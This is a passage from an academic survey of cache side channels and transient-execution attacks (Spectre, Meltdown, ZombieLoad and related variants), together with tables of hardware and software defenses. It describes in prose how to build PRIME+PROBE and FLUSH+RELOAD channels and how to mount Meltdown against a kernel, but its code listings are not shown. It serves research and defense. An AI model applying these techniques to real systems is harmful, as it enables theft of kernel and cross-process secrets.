Building communication channels in the cache hierarchy is an extensively researched topic [1, 20, 26, 45, 46, 55, 69, 107, 109, 119, 174, 179, 180]. Herein, three main categories are defined for building communication channels through the cache hierarchy: eviction-based, replacement-policy-based, and coherence-based. Each category denotes which feature of the cache hierarchical system is being exploited. Eviction-Based channels exploit set sharing between an attacker and a victim. The attacker occupies every way in a set forcing the victim to evict one of its addresses. Replacement-Policy-Based channels exploit the replacement policy state in a set. This is an optimization of the previous channel by controlling the way that is going to be evicted, which avoids the attacker having to probe every way in the set. Coherence-based channels, do not rely on set sharing, instead, they exploit the coherence state of shared memory between the victim and the attacker. There are other channels available in the cache hierarchy that do not fit into these categories [31, 111, 130].

Each of the next sections describe the basic methodology to deploy a type of communication channel. For the examples herein, both the receiver and the sender share a byte-addressable, 4-way set-associative 128 KiB cache with 64 B lines (the hash used for a 32-bit address and the cache parameters are in Figure 8). An example C code is presented for each type of receiver. The sender is common for all channel types, as presented in Listing 2: it transmits the 128 bytes stored in the DATA array by performing secret-dependent memory accesses through array A. Therefore, the secret-dependent memory accesses will program the cache hierarchy in a unique way. A receiver with knowledge of this, is able to extract the contents of DATA.

Fig. 8.

4.1 Eviction-Based Channels

Eviction-Based channels are constructed by a receiver fully occupying a cache set. The information is encoded when the victim evicts an attacker address from the cache set. On a sender access, one of the receiver’s cache lines will be evicted [55, 107, 109, 176]. The receiver probes each address of the set to find if any data was transmitted (PRIME+PROBE). The receiver can also exploit the inclusive policy in use in the hierarchy and force evictions of cache lines in lower-level caches from higher-level caches [34, 68, 90, 175, 176]. As it was stated before (Section 2.2), evicting a cache line from an inclusive cache will evict the same cache line, if it is present, from any lower-level cache. On the other hand, evicting a cache line from a non-inclusive non-exclusive or exclusive cache will not evict the same cache line from any lower-level cache.

The sender in Listing 2 exhibits the properties of an eviction-based transmission channel. The contents of DATA form a unique memory pointer through A. As a result, each access will occupy a different cache set, i.e., the data transmitted is encoded in the occupied set number in the cache. Consider the case where the first byte stored in DATA is 0xa. For i = 0, the pointer A to be loaded in line 3 of the sender is constructed as $\texttt {A} + (\texttt {DATA}[0] \lt \lt \texttt {offset_bits}) \times \texttt {sizeof(uint8_t)}$. The sizeof of a uint8_t is 1 byte, offset_bits is 6 bits, and DATA[0] holds 0xa, thus the pointer is $\texttt {A} + (\texttt {0xa} \lt \lt 6)$. From the hash function in Figure 8, observe that the contents of DATA are being shifted into the index part of the hash, dictating which set of the cache will be occupied. A receiver can detect which sets A occupies by building an eviction set, i.e., finding a group of addresses which fully occupy the same set and, consequently, are the full list of eviction candidates.

Figure 9 shows an example of one eviction-based channel. The receiver fills a cache set with its addresses ①. The sender accesses the same set and is forced to evict one of the receiver addresses ②. The receiver will check if its addresses are still in cache. When loading each address, it will find that $\text{A1}_R$ was evicted due to the high load latency ③. Listing 3 shows C code for the receiver to capture information transmitted by the sender using the described channel. The offset of buf needs to be carefully selected as the transmitted data will be encoded in the number of the occupied set. To create a set collision, j shifts 15 bits (index_bits + offset_bits) such that the set is the same but the tag is different. After filling the set, the receiver will check if data was transmitted by checking the timing of accessing the addresses that were used to fill the set. It is important to note that the attacker cannot control every memory access performed by the victim. There may be other memory accesses, either by the victim, the attacker, or any other process, that will evict data from the attacker’s eviction set. To avoid false positives, the attacker will have to execute Listing 3 multiple times such that the attacker’s analysis is statistically relevant [48].

Fig. 9.

Listing 3.

4.2 Replacement-Policy-Based Channels

Replacement-Policy-Based channels encode the information to be transmitted in the replacement policy of a cache set, but are similar to eviction-based channels. The receiver will build an eviction set. By controlling all addresses, the receiver can access its addresses in a specific pattern so that the replacement policy will evict a specific address when the sender accesses the set. To check what data was transmitted by the sender, the receiver will force an eviction. If the expected line was evicted, then the sender did not transmit data. However, if some other line was evicted instead then the sender did transmit data [20, 119, 174].

For this transmission channel consider that the buffer A is shared between the sender and the receiver. This can occur when the attacker and the victim are sharing the same dynamic library, e.g., libssl for a cryptographic operation. Figure 10 shows an example of a replacement-policy communication channel. The receiver accesses a cache set such that the replacement policy is programmed to select the address $\text{A1}_{S + R}$ for eviction ①. The sender accesses the same address changing in the process the eviction address, to $\text{A3}_R$ ②. The receiver forces an eviction, expecting $\text{A1}_{S + R}$ to be evicted. However, $\text{A3}_R$ was evicted in ③. The receiver can detect which address was evicted by re-accessing the addresses originally in the set, and detect if the sender transmitted data. Listing 4 shows C code for the receiver to capture information transmitted by the sender using the described channel. It is noted that the receiver code is similar to the eviction-based channel with the added steps to program the replacement policy. Similarly, the attacker will have to execute this listing multiple times such that the results are statistically relevant.

Fig. 10.

Listing 4.

4.3 Coherence-Based Channels

Coherence-Based channels depend on modifications to the global coherence state. Furthermore, they are broken into two types, depending on the ability to use the flush instruction. The flush instruction allows a thread to remove its addresses from the cache hierarchy [10, 12, 65]. However, not all privilege levels have access to such an instruction. For example, x86-based systems allow userland processes to execute the instruction [10, 65] but ARM-based systems do not [12, 44]. This section focuses on communication channels built with flush instructions. However, there is research which is able to build coherence-based channels without using a flush instruction [44, 130].

Flush-Based channels encode the transmitted information by placing a memory address in the cache hierarchy, and rely on the sender and receiver sharing some memory, e.g., if the victim and attacker are sharing the same dynamic library. One method to transmit data is for the receiver to flush the expected sender’s transmission from the hierarchy and then re-access it again at a later time (FLUSH+RELOAD) [179]. The second access will either be very fast, because the sender re-accessed the data and placed it in the cache hierarchy, or slower if the data is still in external memory. The presence of the flushed address in the hierarchy indicates that data was transmitted, and the loaded address indicates what data was transmitted.

Another option for the receiver is to continuously flush the data from memory (FLUSH+FLUSH) [46]. Issuing a flush triggers invalidation requests in the coherence network. If there is at least one copy of the cache line in the hierarchy, all invalidation requests will have to complete before the flush instruction completes. Therefore, the second flush will be slow if the data is in the cache hierarchy, and fast if it is not.

Once again, consider that the buffer A is shared between the receiver and sender. Figure 11 shows an example of a FLUSH+RELOAD communication channel. The receiver flushes a shared address from the cache hierarchy ①. The sender accesses the same address again, and places it in the hierarchy ②. The receiver loads the address. A fast access implies that the sender transmit data. Otherwise, a slow access implies that the sender did not transmits data ③. Listing 5 shows C code for the receiver to capture information transmitted by the sender using the described channel. Unlike the eviction-based channel, the receiver does not have to find address collisions for the same set or share a cache level with the sender. Furthermore, if it is known that the victim is the only other process sharing A with the attacker, then the attacker only has to execute Listing 5 once.

Fig. 11.

Listing 5.

5 Mounting Transient-Execution Attacks

Generally, Transient-Execution Attacks (TEA) can be broken into three steps (1) create a transient window of operation, (2) accessing data transiently (Section 3) and (3) encoding data in the micro-architectural state (Section 4). Herein, a transient window is defined as the time the commit stage is stalled waiting for an instruction to complete. The transient window is limited by the size of the ROB (larger than 200 operations in modern OoO architectures [36, 39]) and the latency of the instruction which is stalling the commit stage, e.g., instruction waiting for memory, or the verification latency of the instruction which caused a mis-speculation. To create a transient window, one of these techniques can be used. In the second step, the goal is to use the time until the closure of the transient window to access the desired buffer or memory location. Then in the third step, the data is transmitted from the transient domain into the micro-architectural state. The communication channel used can be any from Section 4, as long as the requirements for each communication channel are met (shared memory, invalidation cache coherence, inclusive caches, flush instruction, instruction can be executed transiently, etc). This section provides a detailed description of how TEAs are constructed using the previously introduced concepts.

To describe these attacks, it is assumed that the attacker and the victim are two different processes or threads, running in the same system. They are both running on the same physical core either simultaneously, through Simultaneous Multi-Threading (SMT), or through time-sharing, with the OS/hypervisor switching the context between the victim and the attacker. Moreover, the attacker will analyze the program of the victim looking for the sender code from one of the communication channels previously described. The state-of-the-art defines two types of attacks depending on which micro-architectural state is being manipulated during the transient window [21, 23]: value prediction (Spectre-type) or exception handling (Meltdown-type). An attacker that deploys a Spectre-type attack trains a speculation mechanism such that, when the victim runs, part of its execution will be through an illegal data-flow path until the misprediction is detected and rolled-back. Hence, the victim uses the micro-architectural state as the attacker designed, accesses the data requested, and encodes the information in a micro-architectural state. An attacker that deploys a Meltdown-type attack triggers an exception in its data-flow path, such that the instruction which triggered the exception is able to read data from micro-architectural buffers, that should not be accessible, and the data is forwarded to other dependent instructions. The attacker, itself, during the transient window, encodes the data into the micro-architectural state for later retrieval.

5.1 Original Spectre-PHT/-BTB and Meltdown-US Attacks

The original Spectre-Type [81] and Meltdown-Type [87] attacks were the first attacks which exploited the timing window of an unverified micro-architectural state to obtain data from a victim and transmit it to an attacker. They are referred to as Spectre-BTB, Spectre-PHT, and Meltdown-US [21].

The original Spectre-BTB/-PHT attacks have two key findings. First, the BTB/PHT is shared between all threads running on the same physical core. Therefore, an attacker with knowledge of the architecture of the BTB/PHT can train it. When the victim runs in the same core, it will perform a mis-speculation in a jump which will execute a sequence of instructions that is not correct [81]. Second, the OoO nature of the core’s backend will always execute instructions regardless of misprediction or not [80, 81]. Listing 6 shows how array checks can be bypassed through misprediction using an attacker controlled x. If x is larger or equal to buf1_size, the buf1 and buf2 loads will not update the architectural state. However, a core that mis-speculates over the control instruction will place the loads in the core’s L1 cache and the coherence state of the cache lines will change. Note that, even if the mis-speculation is detected while both loads are mid-flight, the cache lines will still be allocated because memory instructions that have been dispatched to the cache hierarchy cannot be canceled mid-flight [80]. A victim with this profile can be exploited to transmit the whole contents of its memory space through the cache hierarchy. In this example, data is transmitted using the address generated by buf2.

Consider an example where the victim is an OS kernel and the attacker is a userland process. The attacker has examined the kernel code and found a vulnerable system call that contains the code in Listing 6. In order to exploit the jump in the system call, the attacker will execute a jump of its own that uses the same target and prediction slot, in the PHT, as the exploitable jump in the system call. This is the same problem as the eviction set creation problem from the communication channel in Section 4. With this knowledge, the attacker will execute its jump multiple times, to program the PHT, such that the system called jump performs the same prediction. Note that, the jump executed by the attacker must have the opposite result of the victim’s jump. In this instance, the attacker’s jump will always be not-taken whereas the victim’s jump, with an x greater than $buf1\_size$, will always be mis-predicted as not-taken. After the attacker performs all of these steps, it will cede execution to the victim by calling the vulnerable system call. Figure 12 shows the micro-architectural events when Listing 6 is executed. For simplicity, in all future examples, the step of sending data through the communication channel is bundled as a single comm_channel instruction. Assume the load of buf1_size misses the cache hierarchy and, thus, opens a large speculative window in the micro-architecture ① (Figure 12(a)). The next instruction in the stream is a blt, for the if statement, which the fetch unit predicts to be a not-taken jump to the communication channel (② and ③ in Figure 12(a)). In this state, the commit stage is stalled because of the missing load (④ and ⑤ in Figure 12(b)). Therefore, the blt is not dispatched since it depends on the result of the load. However, the communication channel does not depend on this load and can execute. Thus, the communication channel is dispatched to the functional unit and updates the state of the data cache with the secret data (⑥ and ⑦ in Figure 12(b)).

Fig. 12.

Listing 6.

Listing 7.

The Meltdown-US attack showed that, during transient execution, memory accesses are still able to read the contents of a memory address when the executing thread does not have the correct set of permissions, i.e., when the memory access triggers an exception [87]. This occurs in micro-architectures where the result of an instruction, which triggered an exception, can be forwarded to other dependent instructions and the result is not zeroed (Intel, ARM, and IBM [80]). Similarly to Spectre-BTB/-PHT, if the memory operation is dispatched to the cache hierarchy prior to completing the verification, the cache line will be fetched into the L1 cache. The contents of the memory operation are then forwarded to other dependent instructions which can transmit data to a receiver (Listing 7). Note that, Meltdown-US requires a valid physical address translation of the target address, i.e., the accessed address must be mapped in the attacker’s virtual memory space.

Once again, consider that the victim is the kernel of an OS and the attacker is a userland process. Moreover, consider that the kernel is mapped to every userland process in order to speedup system calls. Through other means, the attacker has figured out a kernel address within its own memory map. Figure 13 shows a micro-architectural example of a Meltdown-US attack being performed by Listing 7. Assume a load misses the cache-hierarchy ① (Figure 13(a)), which opens a large transient window, while a load to the kernel (lw kernel_addr) and the communication channel (comm_channel) wait to be issued. As a result, the commit stages stalls waiting for the load that missed the cache hierarchy ② (Figure 13(b)). Since the micro-architecture has a second issue port, the load to the kernel address is issued to the functional unit and it hits in the cache ③. While executing the load to the kernel address an exception is triggered because the current process does not have the privilege to access that address ③. However, the exception is not triggered immediately because the previous load missed the cache hierarchy, which caused a stall in the commit stage ④ (Figure 13(c)). Furthermore, the result of the load to the kernel address is forwarded to a dependent instruction. In this instance, the communication channel ⑤. The final state of the data cache shows the kernel data encoded.

Fig. 13.

TEAs require the attacker and the victim to share the same micro-architectural resources. However, there is an important difference between Spectre-BTB/-PHT and Meltdown-US. Spectre-BTB/-PHT need to program a specific state and then let the victim execute in the same physical core, i.e., the micro-architectural resource being shared is the branch prediction unit and cache hierarchy. On the other hand, Meltdown-US is even more dangerous as it can be executed by an attacker that is not sharing the same physical core with the victim. In fact, the victim only needs to be loaded into memory [87], i.e., the victim and the attacker share the same memory map, translation entries, and cache hierarchy. The core will pull any data into the cache hierarchy, regardless of permissions, before the exception is triggered.

5.2 Advances in Spectre- and Meltdown-Type Attacks

Further research on how Spectre- and Meltdown-type attacks operate showed there are other components in the micro-architecture that can be exploited. Spectre attacks have gone on to exploit the RSB [83, 93, 170], the memory dependence prediction unit [80, 159], and the global PHT [15]. Meltdown attacks have expanded to exploit other micro-architectural buffer forwardings when an instruction triggers an exception. Recent attacks have shown that data can be forwarded from invalid MSHRs [98, 135, 160, 161], invalid load ports (load ports are pipeline registers that hold data between the L1 cache and the core) [135], invalid store buffer entries [22, 134], and addresses with the present bit set to 0 in the TLB entries [158, 168]. Table 2 shows a summary of the main TEAs published in the literature. The table classifies the attacks by type (Meltdown or Spectre), if it can be executed from a remote core (Remote), describes which micro-architectural interaction is being exploited, and what method is used to deploy the attack. The names for each attack follow the nomenclature introduced by Canella et. al in [21]. Each name is defined by the construction <TYPE>-<EXPLOITED_COMPONENT>.

Table 2.

Name	Type	Remote	Micro-Architectural Interaction	Method
Spectre-PHT Spectre-BTB (Original Spectre) [15, 81]	Spectre	N	BTB and PHT Sharing	Train the victim’s BTB/PHT in order to trick its instruction stream into executing an instruction sequence which reveals secure data.
Meltdown-US (Original Meltdown) [87]	Meltdown	Y	Forward result of instruction which generated an exception to dependent instructions.	Access a memory address for which the current thread does not have permissions. Even though the thread does not have permission, the data is still pulled into the cache hierarchy and forwarded to dependent instructions before triggering the exception.
Spectre-RSB[83, 93, 170]	Spectre	N	RSB Sharing	Train the victim’s RSB in order to trick its instruction stream into executing an instruction sequence which reveals secure data.
Spectre-STL[54]	Spectre	N	Memory Dependence Unit Sharing	Train the memory dependence prediction unit to allow certain loads to execute before a store to the same address. The load will then forward its result to other dependent instructions. Useful if the targeted code is trying to zero secret data.
Meltdown-P (Foreshadow) [158, 168]	Meltdown	N	Pull any data from L1 cache. TLB sharing.	Any valid address translation in the TLB, regardless if it throws an exception due to permissions or presence, can pull data from the L1 cache into dependent instructions. However, it does not allocate an MSHR on a miss, i.e., data cannot be fetched from higher cache levels.
Meltdown-MCA Meltdown-GP (ZombieLoad [135] RIDL [160] CacheOut [161] Fallout [22])	Meltdown	N	Read data from invalid buffers	An exception is triggered when a virtual to physical translation fails due to the PTE not having the present bit set. Despite the exception in the instruction, some micro-architectures try to speculate over the possible address translation using the LSB of the virtual address (assuming 4KiB pages, the 12 LSB). The load with the exception can pull data from MSHR, the store buffer (committed stores), the store queue (uncommitted stores), and the load ports.
Load Value Injection[159]	Spectre/Meltdown	N	Memory Dependence Unit Sharing	Train the victim’s address disambiguation unit such that it loads a value from an attacker chosen address under an exception.

Table 2. A Summary of TEAs Showing Which Type of Attack They Belong to, which Micro-Architectural Interaction is Being used, if the Attack Can be Executed from a Remote Core, and what is the Method to Exploit it

A difficulty in deploying TEAs is the size of the timing window to retrieve data and transmit it. Both must complete for the attack to be successful. There are two limiting factors to the size of the transient window: the verification latency of the misprediction, and the number of instructions that can be executed prior to the conclusion of the verification [163]. In commodity micro-architectures, the highest latency path is a memory access to an address that is not cached and when the virtual address translation is not in the TLB. This scenario has such a high latency that the attacker is only limited by the size of the ROB, assuming no other memory access is in the same circumstances.

The same idea can be applied to Meltdown, the instruction which triggers an exception can be behind another long latency instruction. A difficulty specific to Meltdown is how to handle exceptions so that the attacker can continue executing (triggering an exception results in a process termination). A possible solution is to spawn a child process which will run the Meltdown exploit. The child process will terminate when the instruction which triggered the exception is committed. The parent process can then read the micro-architectural state left by the child. This solution has the shortcoming of performing context switches between the parent and the child, where a context switch may destroy the micro-architectural state left by the child. A better solution would be to handle the SEGFAULT directly [87]. In this case, there would be no context switching between two processes. However, the OS would still have to be called to defer the handling of the exception to the attacker’s signal handler. An even better solution, if available, is to use transactional memory [65]. Within a transactional block, any instruction which triggers an exception will cause the architectural effects of the entire block to not take place, the exception is not delivered to the OS, and normal execution of the program resumes [65, 87, 142]. The OS is not involved, thus the micro-architectural state remains the same [158]. If transactional memory is not available in the platform, the attacker can use Spectre on top of Meltdown. The instruction which will cause the exception is hiding behind an always mispredicted instruction. In this instance, there is no exception to suppress but the micro-architectural effects are the same [158]. The latter technique was used in an attack in micro-architectures which use pointer authentication [123]. Pointer authentication is used to protect privileged memory from being tampered with. Usually, the hash of the pointer is stored next to the pointer in the same stack frame [123]. In the mis-speculation window, the attacker develops a bruteforce pointer authentication oracle to extract the correct hash for the pointer. If the guess is correct, the micro-architecture generates a valid pointer and loading the pointer will result in a communication channel creation. If the guess is incorrect, the pointer is not created and the authentication instruction triggers an exception. By bruteforcing the hash behind a mis-speculation window, the exception, which would cause a program termination, is never triggered.

6 State-of-the-Art Defenses

There are multiple approaches in the state-of-the-art on how to defend against TEAs. Mainly, the literature focuses on the second and third steps of a TEA. The taxonomy adopted herein splits defenses into two categories: defenses that limit or prohibit speculation (the second step in setting up a TEA), and defenses that impede the formation of the communication channel (the final step in setting up a TEA).

6.1 Limited-Speculation Defenses

The key concept behind Limited-Speculation Defenses is that speculation is fundamentally insecure. Therefore, the defenses focus on controlling the micro-architectural state resulting from speculation. Table 3 shows seven techniques and is organized into six categories: whether the technique is a hardware and/or software implementation (HW/SW); what is the defense method (Method); which micro-architectural components are protected by the technique (Protected Components); what the drawbacks of the technique are (Drawbacks); what the maximum performance penalty is (Max. Performance Penalty); and if the technique is backward compatible (BC). Backward compatibility is defined using two variants: one for software and one for hardware. Software BC (SW BC) is defined as the ability to take a previously compiled binary, to the same architecture, and have it execute with the security guarantees provided by the new micro-architecture. Hardware BC (HW BC) is defined as the ability to backport the modifications performed by the technique to older micro-architectures (e.g., a microcode update that changes the behavior of certain instructions [62]). The maximum performance penalty metric used is the maximum reported performance penalty by any of the cited papers for each category and is only valid for the experimental methodology used. To facilitate consultation, the performance penalty is provided with the accompanying citation.

Table 3.

Technique	HW/SW	Method	Protected Components	Drawbacks	Max. Performance Penalty	SW BC	HW BC
Partition Speculation Components [10, 11, 12, 13, 65]	HW	Add PIDs per speculation entry	BTB, PHT, RAS, Memory Dependence	Partition fighting may lead to lower performance	N/A	Y	N
Clear Micro-Architectural State [150, 151, 171]	HW/SW	Flush all shared micro-architectural buffers on context switch	All	Context switches are slower in order to clear the micro-architectural state	2% [171]	Y	N
Trap Speculation [3, 77, 132, 177, 182]	HW	Speculative instructions are only allowed to execute if they do not lead to a communication channel	All	Accesses to methods which lead to a communication channel need to operate in a different micro-architectural domain	21% [177]	Y	N
Speculative State defined in the ISA[5, 12, 65, 92, 167]	HW/SW	Add instructions to the ISA which limit speculation	All	A conservative use of these instructions leads to performance loss [11].	125% [167]	N	Y/N
Retpoline [5, 63, 156]	SW	Trap the indirect jump predictor in a prediction loop	RAS	-	10% [25]	N	-
Runtime Code Injection [148]	HW	Detect TEAs gadgets at runtime and inject code which nullifies their effect	All	Runtime gadget detection and code injection may lead to lower performance	21% [148]	Y	N
Recompilation[5, 8, 9, 11, 56, 60, 74, 108, 120]	SW	Prohibit compilation of transient gadgets. Generate “secure” code sequences.	All	Requires all binaries to be recompiled. New code sequences may not be as performant.	N/A	N	-

Table 3. State-of-the-Art Defenses Which Limit Speculation

BC = Backward Compatibility.

Partition Speculation Components. This is the method currently employed in some current micro-architectures. Intel and ARM use some form of partitioning to limit a process from influencing the speculation results of another process [13, 15]. Each entry in the speculative component has a unique application-specific ID. If there is no full ID match in the entry, the core does not speculate [13]. Its limiting factor is the resource fighting between running processes in the same core. The partitioning components scheme is secure if and only if all shared speculative components are partitioned. It has been shown that one of the latest Intel micro-architectures (Ice Lake), despite having in-silicon defenses against TEAs, is vulnerable to Spectre-type attacks because one shared speculation component, the PHT, was not partitioned [15]. Intel, ARM, and AMD do not provide any benchmarking for this type of defense. Therefore, the performance penalty is unknown. This technique is backward compatible in regards to software, as any software will immediately take advantage of the modifications performed. However, these kinds of modifications cannot be applied directly to older micro-architectures. Therefore, they fail hardware backward compatibility.

Clear Micro-Architectural State. On a context switch, the core will flush all shared micro-architectural buffers. The extent of the flushing depends on the security requirements of the system and/or software. There are proposals to handle the flushing in hardware [171], while others use software [150, 151]. Intel has modified the VERW instruction to overwrite specific micro-architectural components [62, 151]. Hardware solutions are always advantageous to the programmer as they do not have to reason about the micro-architectural state. Software solutions rely on the programmer to execute the correct set of instructions to clear the necessary state. However, hardware solutions are conservative in clearing the micro-architectural state regardless of the security requirements of the software running. Therefore, a software solution can yield better performance in cases where the software’s security model is known. In both cases, flushing part or the whole micro-architectural state adds to the performance penalty of context switches. Similarly to the previous category and for the same reasons, SW BC is maintained and HW BC is voided.

Trap Speculation. The trap speculation technique limits or blocks the results of speculative instructions to a communication channel. Most proposals focus on blocking the cache hierarchy communication channel. As such, they add a per thread private L0 cache to capture the effects of speculative instructions which operate over the cache hierarchy [3, 177]. If the speculation is correct, the effects of the speculative instructions are applied to the cache hierarchy. Otherwise, they are ignored. One proposal stalls or predicts speculative memory accesses until they are verified [133]. Other proposals allow speculation to alter the cache hierarchy but will “undo” the state on a mis-speculation [77, 132]. Another proposal generalized the problem of transmitting data of speculative instructions to a communication channel in any micro-architecture [182]. Recent research showed that these methods can still be attacked [16, 86]. For methods which trap speculation in an L0 cache, the order in which speculative memory accesses, and subsequent memory accesses, are performed cause enough of a timing difference to build a communication channel [16]. For the methods which rollback the mispeculated cache state, the communication channel is built from the timing difference associated with the size of the rollback state [86]. The hardware modifications required by this technique implies that HW BC is voided. However, SW BC is maintained.

Speculative State defined in the ISA. The micro-architectural state is partially defined in the architectural state. This approach has been adopted by Intel [59, 61], AMD [5, 7], and ARM [11, 12]. New instructions are added to the ISA such that the order of operations in relation to a speculative instruction is always guaranteed. Similarly to memory ordering instructions (fences), speculation ordering instructions guarantee that instructions which follow a speculative instruction are not allowed to execute until the speculation has been verified. Intel and AMD provide instructions to limit jump and memory dependence speculation [5, 7, 59, 61]. ARM goes beyond and provides instructions, not only to limit jump and memory dependence speculation, but also to limit any speculation [11, 12]. Old programs will have to be recompiled to take advantage of these new instructions. This voids SW BC. HW BC can be maintained if the older platforms allow microcode updates which introduce new instructions or add side-effects to existing instructions [62]. Another type of protection domain would be in using special hardware, within the backend of the core, that is able to track and stop data forwarding to instructions with measurable side-effects [92, 167]. The previous technique guarantees security in SW BC through extensive hardware modifications. As a result, they can not be backported to older micro-architectures, which means they are not HW BC. Although merging the micro-architectural and the architectural state guarantees speculation behavior to the programmer, it limits the design freedom provided to micro-architecture implementations. Furthermore, the usage of these instructions requires a deep understanding of the micro-architecture to not only guarantee security but to also maintain high performance. Much like memory ordering instructions, a conservative use of speculation limiting instructions will lead to performance loss [11].

Retpoline. Retpoline is a technique which sets up the RAS with a prediction loop. The prediction loop will lock the speculation state into fetching and executing the same safe instruction sequence until the speculation is verified [5, 63, 156]. As this technique relies on precise code in certain function calls, the backward compatibility requirement is not met. Despite limiting the RAS, there is still a vulnerable timing window to perform a Spectre attack while setting up the required prediction loop [97]. Moreover, recent micro-architectures that have in-silicon defenses against RAS TEAs have been shown to still be vulnerable against Spectre [170]. Since Retpoline is a software technique, only SW BC is maintained and considered.

Runtime Code Injection. The decode unit inspects the sequence of outputted micro-code. If the generated micro-code matches that of a TEA, the decoder will inject a specific micro-code sequence that will nullify the effects of the possible mispeculated instructions to a communication channel. These code sequences can be the ones from the previously described techniques, such as: instructions to clear the micro-architectural state, instructions to limit speculation, and/or retpoline. Using the cache hierarchy as a communication channel, the micro-code sequencer injects fence instructions such that some memory accesses are strictly ordered behind a speculative instruction [148]. Regardless of the detection system used, this technique will always be susceptible to new exploits that remain undetected. Furthermore, the detection mechanism and code injection may lead to performance loss in certain workloads [148]. To avoid incurring the performance penalty for every binary, the software environment could mark binaries as safe or unsafe depending on the presence of TEA gadgets or communication channels [56, 74, 108, 120]. Moreover, to further improve performance, the software environment can tag specific regions of interest to defend against TEAs. As for BC, and since this code injection method needs to be the in the decoder stage of the micro-architecture’s pipeline, SW BC is maintained and HW BC is not.

Recompilation. Equivalent to the Runtime Code Injection technique. The compiler detects vulnerable code sequences and replaces them with safe variants [56, 74, 108, 120]. Comparing the recompilation technique with the runtime code injection technique, there is no extra performance penalty for detection and mitigation during runtime. The performance cost of recompilation is paid at compile-time. The disadvantage, in comparison to the runtime alternative, is that the source code needs to be available to perform the recompilation, while the runtime alternative can execute any binary. Hence, recompilation is not SW BC. Both alternatives suffer from the same drawbacks.

A common theme in all techniques that look to limit speculation is that they all impact performance somehow. Moreover, some techniques have outstanding security vulnerabilities. All techniques try to define what the insecure speculative state is and how it should be limited. Except for trap speculation, they consider the speculative state as any computation which stems from any speculation. As a result, they limit the global speculative state. However, the Trap Speculation technique reduces the insecure speculative state to only speculative instructions which leads to communication channels. Recall that a TEA is only successful if the attacker is able to recover data from the victim, and not if there is some manipulated speculative state.

Discussion. Providing security by limiting speculation is a paradigm shift on how micro-architectures are designed and implemented. Through this methodology, the speculative state needs to be precisely defined for all micro-architectural states. This analysis is akin to the allowed memory consistency model [106]. Using formal analysis of speculative states, one can design tools which detect possible insecure states [24, 47, 98, 102, 108, 117, 154]. There is little research done on how a micro-architectural implementation, through a Hardware Description Language (HDL), can be fixed if an illegal speculative state is found [40, 57, 105, 157]. This is a difficult problem to correctly solve as the setup and clearing of a speculative state is particular to each micro-architecture implementation, not to the architectural model (even if it partially defines the speculative state). An unexplored avenue for micro-architectural programming is the usage of hint instructions, behind and not behind speculative instructions, in attacks. Hint instructions are architectural no-operations. However, they directly program the micro-architectural state. Most ISAs provide instructions to hint some prediction mechanism into a known state [10, 65, 126]. These hints commonly affect jump prediction and memory dependence prediction units. Although attacks have been found for particular speculation mechanisms, it does not mean novel speculative components are immune to them. A survey of proposed speculative mechanisms showed that attacks can still be mounted and may provide unlimited access to certain resources in the system [162]. The proposed speculation mechanisms range from value prediction (predict results of operations) to data compression inside and outside the core. It has already been shown that data compression in the cache can be exploited to infer what data is stored in a cache line depending on the level of compression [155]. Value prediction allows an attacker to inject data into the victim’s operations if the predictor is not protected [141].

Summary. Limiting the speculative state is always bound to be a complex task as the current paradigm to design and implement micro-architectures does not define speculative state. Partially defining the micro-architectural state in the ISA is a solution that moves the responsibility of the problem to the programmer. Historically, shifting the responsibilities of the micro-architecture to the programmer have not been advantageous. The design of a micro-architecture is usually around facilitating the programmer’s work. Micro-Architectures employ OoO execution because an OoO execution engine is able to obtain good performance from non-performant code. Cache hierarchies are employed because programs implicitly exhibit locality and temporality in their memory accesses. An example where micro-architectures were designed around a programmer’s ability to write correct and performant code would be in the memory consistency models [106]. Weaker memory models can provide better performance than strong memory models. However, they rely on the programmer having the knowledge to correctly insert memory ordering instructions to get the expected results without sacrificing performance. A recent trend in modern computer architectures sees a preference toward stronger memory models due to the ease of programming. A recent industry example is the stronger ARMv8 memory model. Up until ARMv7, ARM employed a weak memory model which was hard to formally define due to the numerous possible outcomes in many litmus tests [118]. The recent RISC-V memory model, which is still being defined, also shows features that would previously be only in strong memory models [126]. Similarly to memory consistency models, the micro-architectural states allowed after a speculative event can also be defined using strong and weak qualifiers. A weak speculation model allows any state to result from any speculation. A strong speculation model allows a finite number of states to result from a set of known speculative events.

6.2 Limited-Communication-Channel Defenses

Unlike speculation-limited defenses, limited-communication-channel defenses allow cores to speculate. The observation is that speculation is not inherently insecure. However, the insecurity comes from the attacker being able to build a communication channel with the victim. Table 4 shows four techniques for preventing the attacker from communicating with the victim using the cache hierarchy as a communication channel. Table 4 uses the same categories as the previous section: Method, Protected Components, Drawbacks, Maximum Performance Penalty, and backward compatibility (software and hardware).

Table 4.

Technique	HW/SW	Method	Protected Components	Drawbacks	Max. Performance Penalty	BC SW	BC HW
Cache Partitioning [32, 33, 50, 78, 88, 164, 185]	HW/SW	Cache is partitioned between multiple running processes	Cache Level	Performance penalty due to resource fighting	5% [32]	Y	N
Randomized Caches[41, 89, 121, 122, 125, 131, 137, 147, 169, 184]	HW	Each process uses a different hash function to access the cache	Cache Level	Increase in access latency due to hash functions	13% [184]	Y	N
Low Resolution Timers [103, 144, 152]	HW/SW	Timers with high resolution are not available	Micro-Architectural State	-	N/A	Y	Y
Coherence Protocol [172]	HW	Coherence Protocol will mask speculative accesses to the cache hierarchy	Cache Hierarchy	Complexity of the coherence scheme and the network increases	8.3% [172]	Y	N

Table 4. State-of-the-Art Defenses Which Break the Communication Channel

BC = Backward Compatible.

Cache Partitioning. Cache levels, across the hierarchy, are split among all running processes in the system. The size of each partition can be statically defined [6, 32, 35, 53, 88], a certain number of sets, ways, or both are always reserved for a certain process, or dynamically defined [33, 50, 164, 185], depending on certain heuristics. Regardless of using dynamic or static partitions, there is always a limit to the number of partitions a cache can hold. Partitioning uses unique process identifiers to gate access to a partition state. No process other than the owner can change the state of a partition, namely its size or content. Statically partitioned caches are immune to the construction of communication channels because no other process other than the owner of the partition can manipulate its state. However, due to the strictness of the partition state guarantees, these designs lose performance when more demanding processes are given smaller partitions than less demanding processes. Dynamically defined partitions circumvent the performance issues but may be vulnerable to a new kind of communication channel. An attacker can deploy multiple processes which will attempt to reduce the partition of the victim and occupy all but one partition in the cache. When the victim requires a larger partition, the controller will have to reduce an attacker-controlled partition. The attacker can inspect all partitions and infer some data transmission from how a partition was reduced. It is important to note that, once again, if the attacker does not use a communication-channel in the cache hierarchy then defenses provided by Cache Partitioning are ineffective.

